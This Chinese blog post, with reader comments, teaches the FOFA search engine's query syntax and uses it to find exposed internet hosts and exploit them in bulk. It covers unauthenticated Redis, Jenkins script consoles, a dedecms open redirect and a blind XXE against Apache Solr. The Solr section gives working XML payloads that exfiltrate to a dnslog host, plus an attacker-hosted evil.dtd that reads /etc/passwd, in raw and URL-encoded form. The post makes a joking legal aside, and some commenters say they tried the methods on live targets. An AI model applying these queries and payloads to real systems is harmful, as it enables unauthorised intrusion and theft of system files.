FOFA是一款非常强大的搜索引擎,关于对于fofa的描述是:FOFA(网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。
相对于shodan来说fofa的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。
fofa的功能这么强大,那我们要怎么利用好提供的功能来挖洞呢?
fofa官方提供了一些基本语法:
| 搜索条件 | 搜索内容 |
|---|---|
| title="beijing" | 从标题搜索北京 |
| header="elastic" | 从http头中搜索“elastic” |
| body="网络空间测绘" | 从html正文中搜索“网络空间测绘” |
| domain="qq.com" | 搜索根域名带有qq.com的网站。 |
| icon_hash="-247388890" | 搜索使用此icon的资产。 |
| host=".gov.cn" | 从url中搜索”.gov.cn” |
| is_honeypot=true | 查询蜜罐资产 |
| ip="220.181.111.1/24" | 查询IP为“220.181.111.1”的C网段资产 |
| ... | ... |
而真正高效的用法就是灵活使用逻辑运算符,fofa可以使用高级搜索:括号 和 && || !=等符号进行指纹的组合。
比如我们想搜索开放3389端口并且位于中国的IP,对应的语法就是port="3389" && country=CN
下面就展示一些利用fofa来刷洞的过程。
不过在这之前一定要注意,遵守法律法规,不要作出破坏性的行为,不要做未授权的测试。
不然...嘿嘿嘿,有个地方包吃包住还送白金手镯。
下面的例子,就是利用fofa来刷洞的例子,少年发挥你的想象力吧。
1、Redis未授权fofa语法搜索:
port="6379"
直接nc 连 6379端口
输入命令info返回了redis基本信息
2、Jenkins 未授权
fofa语法搜索:
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
在默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令。
所以jenkins未授权的危害非常大。
执行一下命令:
3、Apache solr XML 实体注入漏洞
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现
fofa语法搜索:
app="Solr" && port="8983"
找到了目标ip进入主界面
可以看到版本小于7.0,所以可能存在xxe
进入搜索框,切换成搜索xxe
BP抓包构造payload尝试外带,外带地址是dnslog:qmurld.dnslog.cnpayload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://qmurld.dnslog.cn/">
%remote;]>
<root/>&wt=xml&defType=xmlparser
将payload进行url编码
%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C%21DOCTYPE%20root%20%5B%0A%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A//qmurld.dnslog.cn/%22%3E%0A%25remote%3B%5D%3E%0A%3Croot/%3E&wt=xml&defType=xmlparser
发现外带成功,所以存在xxe漏洞
因为是Blind xxe,所以在需要在vps服务器上构造恶意的dtd
放在服务器上的evil.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">
BP请求的内容
<?xml+version="1.0"+?><!DOCTYPE+root[<!ENTITY+%+ext+SYSTEM+"http://vps的ip地址:端口/evil.dtd">%ext;%ent;]><r>&data;</r>
请求的内容也需要进行url编码
%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f ip:port %2fevil.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E
发现已经成功读取到/etc/passwd
4、dedecms url跳转漏洞
先在fofa语法搜索
body="/plus/download.php"
在后面加入链接/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D跳转到百度,
百度url要base64编码
成功跳转
更多的姿势还需要多多发挥想象力,去组合,去找到对应漏洞的特征。
上海市南汇区 1F
这语法讲解挺清楚的,收藏了
韩国 B1
@ 栓Q 语法是清楚,但新手连注册都卡在验证码
北京市 2F
redis那个例子实测可用,昨天刚试过
陕西省榆林市 3F
Jenkins未授权风险确实大,之前中招过
黑龙江省大兴安岭地区 4F
solr的xxe案例很详细啊👍
山东省临沂市 B1
@ 金辉 solr的xxe现在还能打?我试了几个没回显
山东省滨州市 5F
fofa比shodan好用吗?
广东省深圳市 6F
有没有更简单的挖洞入门方法?
韩国 7F
注意法律红线很重要⚠️
上海市 8F
dedecms案例有点老了,现在还能用吗
辽宁省沈阳市 B1
@ 幻星之息 dedecms这漏洞早修了吧,别误导新人
日本 9F
这些案例对新手很友好,感谢分享
福建省龙岩市 10F
第一次知道fofa能识别蜜罐,这个功能实用
上海市 11F
fofa那个蜜罐识别真香,上次误扫差点翻车
浙江省衢州市 12F
port=”6379″一搜一大把,但好多都打不开啊
巴基斯坦 13F
Jenkins那个脚本执行界面默认关了吧?求确认
日本 14F
刚用fofa搜了gov.cn,结果全是403,笑死
广东省 15F
说真的,不授权就别碰,白金手镯不好戴
印度尼西亚 16F
我之前拿fofa找redis,连上发现是蜜罐,吓一跳
广东省深圳市 17F
有没有人试过结合nuclei批量验证?感觉效率更高
北京市 18F
Redis那个例子蛮实用,刚好手头有个目标
韩国 19F
Solr那个xxe挺复杂的,没看懂
印度尼西亚 20F
蜜罐识别功能更新了?之前被坑过
山东省临沂市 B1
@ 柳拂烟 被坑过+1,现在识别功能还挺好用的
广东省惠州市 21F
Apache Solr小于7.0的现在还多吗?🤔
福建省厦门市 22F
Jenkins那个例子挺典型,之前遇到过